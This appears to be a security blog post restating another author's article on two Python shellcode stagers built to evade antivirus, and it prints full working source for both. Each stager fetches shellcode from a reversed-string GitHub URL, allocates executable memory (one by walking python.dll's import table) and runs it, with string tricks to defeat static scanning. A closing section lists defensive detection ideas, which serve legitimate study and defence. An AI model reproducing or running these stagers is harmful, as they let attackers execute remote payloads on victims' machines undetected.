Executive Summary
The g3tsyst3m blog post walks through two Python-based shellcode stagers that both achieve 0/63 on VirusTotal by attacking the weakest point in modern endpoint defence: static analysis. Variant 1 is a 135-line dropper that downloads a remote payload, reverses suspicious API strings (NtAllocateVirtualMemory, NtCreateThreadEx, memmove) so they never appear as plaintext tokens, allocates RWX memory through the NT-layer instead of kernel32, and spawns a thread to detonate the shellcode — no disk writes, no PE loader involvement, no obviously malicious imports. Variant 2 raises the bar: it skips VirtualAlloc entirely as a named symbol and instead parses the on-disk copy of pythonXY.dll with pefile, walks the Import Address Table looking for the reversed needle collAlautriV, computes the runtime IAT slot from base + RVA − ImageBase, dereferences it to read the live VirtualAlloc pointer the Windows loader wrote there at startup, and casts that pointer to a callable through ctypes.WINFUNCTYPE.
For defenders the takeaway is not the obfuscation tricks themselves — reversed strings unwind in a sandbox in milliseconds — it is the choice of carrier. Python interpreters are an unusual but rarely-monitored execution surface: legitimate Python rarely allocates RWX, rarely calls NtCreateThreadEx, and never walks the IAT of its own runtime DLL. The article ends with ten dynamic-analysis detection ideas that operate at exactly those behavioural seams — from ETW Microsoft-Windows-Threat-Intelligence ALLOCVM events out of interpreter processes, to memory scanning of execute-only pages after the decode happens. This post reproduces both stagers in full and unpacks each evasion mechanism phase by phase.
Why script interpreters as a carrier
There is no silver bullet for EDR bypass — the author opens with that observation, and with ML-assisted scoring now wired into most modern endpoint products the surface keeps shifting. What does work, repeatedly, is picking a host process that the defender’s telemetry treats as benign. Script interpreters — Python, Ruby, Perl, even PHP — sit in that sweet spot: they execute arbitrary user code but their on-disk artifacts (a .py file, a portable python.exe) are scrutinised far less aggressively than a compiled PE. PowerShell occupies the opposite extreme; threat actors have abused it so thoroughly that staying FUD inside powershell.exe is “incredibly difficult—but certainly not impossible.”
FUD Stager Variant #1
High-level overview
- Build the staging URL by reversing a string (
SCODE_U[::-1]) so the destination never appears in cleartext. - Download the raw shellcode bytes into memory over HTTPS.
- Allocate RWX memory through
NtAllocateVirtualMemory— the NT-layer call, not thekernel32wrapper — to slip past API hooks that monitor only the upper layer. - Copy the bytes in with
memmove. - Detonate via
NtCreateThreadExwith the new region as the start address. - Every suspicious API name (
_api,_api2, …) is stored reversed and resolved withgetattr(ntdll, name[::-1])at runtime.
The net effect is a 135-line in-memory dropper that never touches disk after the initial .py.
Part 1 — Bypassing static analysis
The first defensive layer to climb is not a behavioural sensor — it is the static scoring model. Two tricks do most of the work: rename or shorten any obvious offsec term (shellcode → scode, download_shellcode → dwnlod_scode), and store every flagged API name reversed so it gets unwound at runtime.
Two illustrative reversals:
_api = "yromeMlautriVetacollAtN" # NtAllocateVirtualMemory reversed SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
Why string detection matters
Whether the engine is signature-based or model-based, almost every static layer ends up doing some form of token scoring. Strings like VirtualAlloc, CreateThread, NtAllocateVirtualMemory, and shellcode carry heavy malicious weight in any pretrained classifier. The goal is not invisibility but threshold management: stay under the score that triggers a block or a quarantine. Reversing the API strings and resolving them at runtime is, as the author puts it, “about as low-effort as obfuscation gets” — and it works precisely because a static engine, by definition, cannot execute your code to unwind the reversal.
Variable names matter
Equally simple, equally effective: rename your variables, functions and even comments away from the giveaway tokens. download_shellcode is a gift to any analyst or scanner; dwnlod_scode won’t fool a human for long, but human reviewers are not the audience — the pre-execution scoring pass is. The point is to nudge the file’s aggregate token score below the disposition threshold.
Part 2 — Downloading the shellcode into memory
The shellcode lives in a public Github repo. The URL is stored reversed (SCODE_U) and unwound at runtime. To keep the hosted file itself off the obvious-extension radar, the author renames it to .dyno — an extension Windows does not associate with anything, which receives less scrutiny than .bin would.
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
try:
response = requests.get(url, stream=True) # Stream for large files
response.raise_for_status()
shel_ly = b''.join(response.iter_content(chunk_size=4096)) # Load fully into bytes
print(f"[+] Dwnlded {len(shel_ly)} bytes of scode")
return shel_ly
except Exception as e:
print(f"[-] Dwnld failed: {e}")
return None
The function streams the response and returns the raw bytes as shel_ly. No open(), no write(), no on-disk artifact — the payload lives only as a Python bytes object until execution.
Part 3 — Eggsecuting shellcode in memory 🥚
The author keeps the execution path deliberately plain — no direct syscalls, no advanced injection trick — just to see how far minimal obfuscation alone can carry the sample. The single concession to evasion is using the NT layer instead of the kernel32 wrappers, which lifts the calls above a common ring of user-mode hooks.
Obfuscated Windows API calls
"eldnaHesolC"[::-1] -> CloseHandle "tcejbOelgniSroFtiaW"[::-1] -> WaitForSingleObject "yromeMlautriVetacollAtN"[::-1] -> NtAllocateVirtualMemory "xEdaerhTetaerCtN"[::-1] -> NtCreateThreadEx "evommem"[::-1] -> memmove
Allocating executable memory through the NT API
NtAllocateVirtualMemory (the lower-level cousin of VirtualAlloc exported from ntdll) requests a region in the current process with the classic offensive triple: MEM_COMMIT | MEM_RESERVE for the allocation type and PAGE_EXECUTE_READWRITE for the protection. Textbook RWX.
Copy and execute
memmove (also resolved by string reversal) blits the downloaded bytes into the freshly allocated RWX region. Then NtCreateThreadEx spawns a thread inside the current process with the start address pointed at the beginning of the shellcode. WaitForSingleObject blocks for up to ten seconds for the thread to finish, then CloseHandle tidies up.
def eggsecute_scode(scode2):
# Constants
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
kernel32 = ctypes.windll.kernel32
ntdll = ctypes.windll.ntdll
_api4 = "eldnaHesolC"
closingtime = getattr(kernel32, _api4[::-1])
closingtime.restype = wintypes.DWORD
closingtime.argtypes = [
wintypes.HANDLE, # hHandle
]
_api3 = "tcejbOelgniSroFtiaW"
waitinaround = getattr(kernel32, _api3[::-1])
waitinaround.restype = wintypes.DWORD
waitinaround.argtypes = [
wintypes.HANDLE, # hHandle
wintypes.DWORD, # dwMilliseconds
]
_api = "yromeMlautriVetacollAtN" #
Allocator = getattr(ntdll, _api[::-1])
Allocator.restype = wintypes.BOOL
Allocator.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(wintypes.LPVOID),
ctypes.c_void_p,
ctypes.POINTER(ctypes.c_size_t),
wintypes.DWORD,
wintypes.DWORD,
]
_api2 = "xEdaerhTetaerCtN"
thred_the_needle = getattr(ntdll, _api2[::-1])
thred_the_needle.restype = wintypes.LONG # NTSTATUS
thred_the_needle.argtypes = [
ctypes.POINTER(wintypes.HANDLE), # ThredHandel (out)
ctypes.c_ulong, # DesiredAccess
ctypes.c_void_p, # ObjectAttributes
wintypes.HANDLE, # ProcessHandle
ctypes.c_void_p, # StartRoutine (your scode addr)
ctypes.c_void_p, # Argument
ctypes.c_ulong, # CrateFlags (0 = run immediately)
ctypes.c_size_t, # ZeroBits
ctypes.c_size_t, # StackSize
ctypes.c_size_t, # MaximumStackSize
ctypes.c_void_p, # AttributeList
]
addr = wintypes.LPVOID(0)
size = ctypes.c_size_t(len(scode2))
current_process = wintypes.HANDLE(-1)
status = Allocator(
current_process,
ctypes.byref(addr),
0,
ctypes.byref(size),
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE
)
if status == 0: # NTSTATUS 0 = success
mem_addr = addr.value
print(f"[+] Allcted mem at: 0x{mem_addr:x}")
_api0 = "evommem"
m3mMov3r = getattr(ctypes, _api0[::-1])
m3mMov3r(mem_addr, scode2, len(scode2))
print("[+] Scode copied to memory")
h_thread = wintypes.HANDLE(0)
status2 = thred_the_needle(
ctypes.byref(h_thread),
0x1FFFFF, # THRED_ALL_ACCESS
None,
current_process,
ctypes.cast(mem_addr, ctypes.c_void_p), # scode start address
None,
0, # no flags, start immediately
0,
0,
0,
None
)
if status2 == 0:
print(f"[+] Thredded Needle!")
waitinaround(h_thread.value, 10000)
closingtime(h_thread.value)
else:
print(f"[-] thred_the_needle failed: {hex(status2 & 0xFFFFFFFF)}")
else:
print(f"[-] Allocator failed (NTSTATUS: 0x{status:08X})")
Bringing it all together
One hundred and thirty-five lines of Python, and an effective in-memory shellcode runner with no disk write. At submission time the sample scored 0/63 on VirusTotal — FUD achieved.



Full source — Variant #1
#27e51de6e6a555bc622a3769ee030bfd92079022780ca8bb33958479562dfc6e
import requests
import ctypes
from ctypes import wintypes
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
try:
response = requests.get(url, stream=True) # Stream for large files
response.raise_for_status()
shel_ly = b''.join(response.iter_content(chunk_size=4096)) # Load fully into bytes
print(f"[+] Dwnlded {len(shel_ly)} bytes of scode")
print(shel_ly)
return shel_ly
except Exception as e:
print(f"[-] Dwnld failed: {e}")
return None
def eggsecute_scode(scode2):
# Constants
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
kernel32 = ctypes.windll.kernel32
ntdll = ctypes.windll.ntdll
_api4 = "eldnaHesolC"
closingtime = getattr(kernel32, _api4[::-1])
closingtime.restype = wintypes.DWORD
closingtime.argtypes = [
wintypes.HANDLE, # hHandle
]
_api3 = "tcejbOelgniSroFtiaW"
waitinaround = getattr(kernel32, _api3[::-1])
waitinaround.restype = wintypes.DWORD
waitinaround.argtypes = [
wintypes.HANDLE, # hHandle
wintypes.DWORD, # dwMilliseconds
]
_api = "yromeMlautriVetacollAtN" #
Allocator = getattr(ntdll, _api[::-1])
Allocator.restype = wintypes.BOOL
Allocator.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(wintypes.LPVOID),
ctypes.c_void_p,
ctypes.POINTER(ctypes.c_size_t),
wintypes.DWORD,
wintypes.DWORD,
]
_api2 = "xEdaerhTetaerCtN"
thred_the_needle = getattr(ntdll, _api2[::-1])
thred_the_needle.restype = wintypes.LONG # NTSTATUS
thred_the_needle.argtypes = [
ctypes.POINTER(wintypes.HANDLE), # ThredHandel (out)
ctypes.c_ulong, # DesiredAccess
ctypes.c_void_p, # ObjectAttributes
wintypes.HANDLE, # ProcessHandle
ctypes.c_void_p, # StartRoutine (your scode addr)
ctypes.c_void_p, # Argument
ctypes.c_ulong, # CrateFlags (0 = run immediately)
ctypes.c_size_t, # ZeroBits
ctypes.c_size_t, # StackSize
ctypes.c_size_t, # MaximumStackSize
ctypes.c_void_p, # AttributeList
]
addr = wintypes.LPVOID(0)
size = ctypes.c_size_t(len(scode2))
current_process = wintypes.HANDLE(-1)
status = Allocator(
current_process,
ctypes.byref(addr),
0,
ctypes.byref(size),
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE
)
if status == 0: # NTSTATUS 0 = success
mem_addr = addr.value
print(f"[+] Allcted mem at: 0x{mem_addr:x}")
_api0 = "evommem"
m3mMov3r = getattr(ctypes, _api0[::-1])
m3mMov3r(mem_addr, scode2, len(scode2))
print("[+] Scode copied to memory")
h_thread = wintypes.HANDLE(0)
status2 = thred_the_needle(
ctypes.byref(h_thread),
0x1FFFFF, # THRED_ALL_ACCESS
None,
current_process,
ctypes.cast(mem_addr, ctypes.c_void_p), # scode start address
None,
0, # no flags, start immediately
0,
0,
0,
None
)
if status2 == 0:
print(f"[+] Thredded Needle!")
waitinaround(h_thread.value, 10000)
closingtime(h_thread.value)
else:
print(f"[-] thred_the_needle failed: {hex(status2 & 0xFFFFFFFF)}")
else:
print(f"[-] Allocator failed (NTSTATUS: 0x{status:08X})")
if __name__ == "__main__":
print("[*] Dwnlding scode from URL...")
scode = dwnlod_scode(SCODE_U)
if scode:
print("[*] Eggsecuting Scode in mem...")
eggsecute_scode(scode)
else:
print("[-] Aborting.")
FUD Stager Variant #2
High-level overview
Variant #2 removes VirtualAlloc from the static surface entirely. Instead of looking the symbol up (via GetProcAddress or even via reversed-string indirection through ctypes), it borrows what the Python interpreter has already loaded: the kernel32 import resolved into pythonXY.dll’s IAT. The runtime address of VirtualAlloc is sitting in memory the moment Python is running — you just have to walk to it. The assumption is a portable Python (so the on-disk pythonXY.dll is available for PE parsing).
The resolved IAT pointer becomes a typed function pointer (ctypes.WINFUNCTYPE), giving the stager direct callable access to VirtualAlloc without ever naming the symbol explicitly. No direct API call. No obvious import. No GetProcAddress. Static analysis loses another anchor.

python314.dll base address, IAT-resolved VirtualAlloc pointer, RWX page allocated. Source: original article.
copy_to_page copies the downloaded bytes and exec_page invokes the cast function pointer. Source: original article.Part 1 — The familiar downloader
The opening is intentionally identical to Variant #1 — the URL is stored reversed, the variable is renamed to SCODE_U, the download path drops the bytes into a Python bytes object. New here is the conditional pefile import.
import ctypes, sys, os
import requests
try:
import pefile
except ImportError:
print("pip install pefile"); sys.exit(1)
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
try:
response = requests.get(url, stream=True)
response.raise_for_status()
shel_ly = b''.join(response.iter_content(chunk_size=4096))
print(f"[+] Downloaded {len(shel_ly)} bytes")
return shel_ly
except Exception as e:
print(f"[-] Download failed: {e}"); return None
Part 2 — Copy/exec helpers
Two short helpers: copy_to_page uses ctypes.memmove to blit the shellcode into the RWX region, and exec_page casts that page address to a void(*)(void) through ctypes.WINFUNCTYPE(None) and calls it. Note ctypes accepts a Python bytes object directly as the src argument to memmove, which keeps the call site clean.
def copy_to_page(page: int, scode: bytes) -> bool:
"""Copy scode bytes into the RWX page via ctypes.memmove."""
if not page:
print("[-] Invalid page address"); return False
if len(scode) > 0x1000:
print(f"[-] Scode too large ({len(scode)} > 0x1000)"); return False
# memmove(dst, src, count)
# dst = raw integer address of our RWX page
# src = scode bytes (ctypes accepts bytes directly as src)
ctypes.memmove(page, scode, len(scode))
print(f"[+] Copied {len(scode)} bytes → 0x{page:016x}")
return True
def exec_page(page: int):
"""Cast the page to a void(*)(void) and call it."""
thunk = ctypes.WINFUNCTYPE(None)(page)
print(f"[+] Executing scode @ 0x{page:016x}")
thunk()
Part 3 — Walking the IAT to locate VirtualAlloc
Phase 1 — build the DLL name and path dynamically
Compose pythonXY.dll from sys.version_info at runtime — python313.dll, python314.dll, whatever the interpreter happens to be. The on-disk dll_path is what pefile will read to parse section headers, the import directory, and ImageBase. The same code works across every Python minor release with no edits.
ver = sys.version_info
dll_name = f"python{ver.major}{ver.minor}.dll"
dll_path = os.path.join(os.path.dirname(sys.executable), dll_name)
Phase 2 — live in-memory base address
GetModuleHandleW returns the base address of the already-loaded module — no new mapping, no disk read. Python is running, so pythonXY.dll is resident. The explicit restype = c_void_p is important: without it ctypes would truncate the 64-bit address to a signed 32-bit int.
k32 = ctypes.windll.kernel32
k32.GetModuleHandleW.restype = ctypes.c_void_p
k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
base = k32.GetModuleHandleW(dll_name)
Phase 3 — parse the on-disk PE
Read the same DLL from disk just for its layout — section headers, import directory offsets, ImageBase. fast_load=False together with the explicit parse_data_directories() ensures the full import table is materialised.
pe = pefile.PE(dll_path, fast_load=False)
pe.parse_data_directories()
Phase 4 — walk the IAT, resolve the live pointer
Filter to kernel32.dll imports only and match against b"VirtualAlloc" — which never appears in plaintext because the bytestring b"collAlautriV" is reversed at compare time. For the match, imp.address is the on-disk VA of the IAT slot; subtracting pe.OPTIONAL_HEADER.ImageBase converts it to an RVA; adding the live base converts the RVA into the actual runtime address of the slot. c_uint64.from_address(slot).value dereferences the eight-byte pointer the Windows loader wrote there at startup. The result va_va is the live, post-ASLR, post-loader-resolution runtime address of VirtualAlloc, ready to be cast to a callable.
memprep = b"collAlautriV" # "VirtualAlloc" reversed
for entry in pe.DIRECTORY_ENTRY_IMPORT:
if b'kernel32' in entry.dll.lower():
for imp in entry.imports:
if imp.name == memprep[::-1]:
slot = base + imp.address - pe.OPTIONAL_HEADER.ImageBase
va_va = ctypes.c_uint64.from_address(slot).value
Part 4 — cast and execute
ctypes.WINFUNCTYPE turns the raw va_va integer into a typed callable whose signature mirrors VirtualAlloc: returns void*, takes void*, SIZE_T, DWORD, DWORD. Calling it with NULL, 0x1000, MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40) returns a fresh RWX page — without a single direct reference to the function name anywhere in the binary text.
MemoryAllocator = ctypes.WINFUNCTYPE(
ctypes.c_void_p,
ctypes.c_void_p, ctypes.c_size_t,
ctypes.c_uint32, ctypes.c_uint32
)(va_va) # <--here's where we cast it
page = MemoryAllocator(None, 0x1000, 0x3000, 0x40)
print(f"[+] RWX page @ 0x{page:016x}" if page else f"[-] failed (GLE={k32.GetLastError()})")
if page:
print("[+] allocated!")
Then the familiar finale: download the shellcode, copy it into the page, jump to it. The cleanup block (VirtualFree with MEM_RELEASE = 0x8000) only runs if the shellcode returns — which most reverse-shell payloads don’t.
# ── execution ─────────────────────────────────────────────────────────────────────
scode = dwnlod_scode(SCODE_U)
if scode:
# page = your VAlloc result from earlier
if copy_to_page(page, scode):
exec_page(page)
# ── cleanup (only reached if shellcode returns) ───────────────────────────────
k32.VirtualFree(ctypes.c_void_p(page), 0, 0x8000)
print("[*] freed")
VirusTotal results 💊
Hash: 6c2a91f23724a8605312bff1d629f92a7a88e78d947e79da5e403338f4eefeb6

Full source — Variant #2
#6c2a91f23724a8605312bff1d629f92a7a88e78d947e79da5e403338f4eefeb6
import ctypes, sys, os
import requests
try:
import pefile
except ImportError:
print("pip install pefile"); sys.exit(1)
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
try:
response = requests.get(url, stream=True)
response.raise_for_status()
shel_ly = b''.join(response.iter_content(chunk_size=4096))
print(f"[+] Downloaded {len(shel_ly)} bytes")
return shel_ly
except Exception as e:
print(f"[-] Download failed: {e}"); return None
def copy_to_page(page: int, scode: bytes) -> bool:
"""Copy scode bytes into the RWX page via ctypes.memmove."""
if not page:
print("[-] Invalid page address"); return False
if len(scode) > 0x1000:
print(f"[-] Scode too large ({len(scode)} > 0x1000)"); return False
# memmove(dst, src, count)
# dst = raw integer address of our RWX page
# src = scode bytes (ctypes accepts bytes directly as src)
ctypes.memmove(page, scode, len(scode))
print(f"[+] Copied {len(scode)} bytes → 0x{page:016x}")
return True
def exec_page(page: int):
"""Cast the page to a void(*)(void) and call it."""
thunk = ctypes.WINFUNCTYPE(None)(page)
print(f"[+] Executing scode @ 0x{page:016x}")
thunk()
ver = sys.version_info
dll_name = f"python{ver.major}{ver.minor}.dll"
dll_path = os.path.join(os.path.dirname(sys.executable), dll_name)
k32 = ctypes.windll.kernel32
k32.GetModuleHandleW.restype = ctypes.c_void_p
k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
base = k32.GetModuleHandleW(dll_name)
print(f"[*] {dll_name} @ 0x{base:016x}")
pe = pefile.PE(dll_path, fast_load=False)
pe.parse_data_directories()
memprep=b"collAlautriV"
va_va = 0
for entry in pe.DIRECTORY_ENTRY_IMPORT:
if b'kernel32' in entry.dll.lower():
for imp in entry.imports:
if imp.name == memprep[::-1]:
slot = base + imp.address - pe.OPTIONAL_HEADER.ImageBase
va_va = ctypes.c_uint64.from_address(slot).value
break
if not va_va:
print("[-] collAlautriV not found in IAT"); sys.exit(1)
print(f"[+] collAlautriV @ 0x{va_va:016x}")
MemoryAllocator = ctypes.WINFUNCTYPE(
ctypes.c_void_p,
ctypes.c_void_p, ctypes.c_size_t,
ctypes.c_uint32, ctypes.c_uint32
)(va_va)
page = MemoryAllocator(None, 0x1000, 0x3000, 0x40)
print(f"[+] RWX page @ 0x{page:016x}" if page else f"[-] failed (GLE={k32.GetLastError()})")
if page:
print("[+] allocated!")
# ── execution ─────────────────────────────────────────────────────────────────────
scode = dwnlod_scode(SCODE_U)
if scode:
# page = your VAlloc result from earlier
if copy_to_page(page, scode):
exec_page(page)
# ── cleanup (only reached if shellcode returns) ───────────────────────────────
k32.VirtualFree(ctypes.c_void_p(page), 0, 0x8000)
print("[*] freed")
Key Takeaways
- String reversal beats token scoring.
"yromeMlautriVetacollAtN"[::-1]is a one-line trick that erases the most heavily-weighted feature from a static classifier’s view. Same logic for variable names. - Carrier choice matters more than the obfuscation. A Python interpreter is an unusual but legitimate process; a malicious PE is not. Both stagers achieve 0/63 on VirusTotal largely because the file under analysis is a
.py, not an EXE. - NT-layer APIs slip past common user-mode hooks. Most hooking products instrument the
kernel32wrappers and miss thentdllentry points. Free evasion with no opsec cost on the static side. - IAT walking removes the symbol from the surface entirely. If the host process has already loaded the function you want, the loader has already written its live address into the IAT — you just have to parse the PE, locate the slot, and dereference. No
GetProcAddress, no import you control. - RWX in one shot is still legal in Win32. No
VirtualProtecttwo-step needed; both stagers allocate executable-and-writable straight from the allocator. That’s a strong behavioural signal — cheap to detect dynamically, invisible statically. - 0/63 is a static metric, not a behavioural one. The author is explicit that dynamic detection of these stagers is straightforward; the entire technique lives in the pre-execution window.
Defensive Recommendations
The original article closes with ten dynamic-detection ideas. Restated here in deployment-friendly form:
- Alert on RWX allocations originating from
python.exe(and other interpreter binaries). Legitimate Python workloads almost never requestPAGE_EXECUTE_READWRITE. - Consume the ETW
Microsoft-Windows-Threat-Intelligenceprovider and alert onALLOCVMevents with execute permissions emitted by interpreter processes. - Detect execution out of private, non-image-backed memory regions. Anything calling code from a private commit that isn’t mapped from a PE on disk is high signal.
- Correlate outbound network → allocation → execution within one process lifetime. The temporal chain is the giveaway, not any single event.
- Track
python-requestsUser-Agent strings — especially talking to anonymous file hosts or raw-file CDNs. - Flag
NtAllocateVirtualMemory/NtCreateThreadExoriginating from Python interpreters. Direct NT-layer use from a script interpreter is anomalous on its own. - Sandbox-detonate unknown
.pyfiles with full API call tracing. Reversed strings unwind into plaintext in dynamic traces — what disappears statically is plainly visible at runtime. - Alert on
python.exewith no console / GUI parent making outbound connections. The execution context shape (orphan interpreter, network egress) is detectable. - Detect
pefileimport activity at runtime. A running Python process parsing a PE is unusual outside of explicit RE / dev tooling. - Scan execute-permission private regions periodically. Shellcode signatures that evade static scanning are often trivially detectable in-memory after decoding.
Conclusion
The g3tsyst3m post is a useful reminder that FUD is not a property of a payload — it is a property of a static analysis pipeline at a moment in time. Both stagers will eventually be detected as classifiers retrain on this exact pattern (string reversal of NT-layer API names is a strong signal once the model knows to look for it). What makes the post valuable is the mechanical clarity of the IAT-walking trick in Variant #2: it shows how much of the static surface vanishes when you treat the host process’s loader as your symbol-resolution oracle. For defenders the same clarity points exactly where to instrument — behavioural detection of RWX-from-interpreter, NT-API-from-interpreter, and private-region execution catches both variants regardless of how the strings are spelt on disk.
Original text: “Creative approaches to coding FUD Stagers” by R.B.C. (g3tsyst3m) at G3tSyst3m’s Infosec Blog.

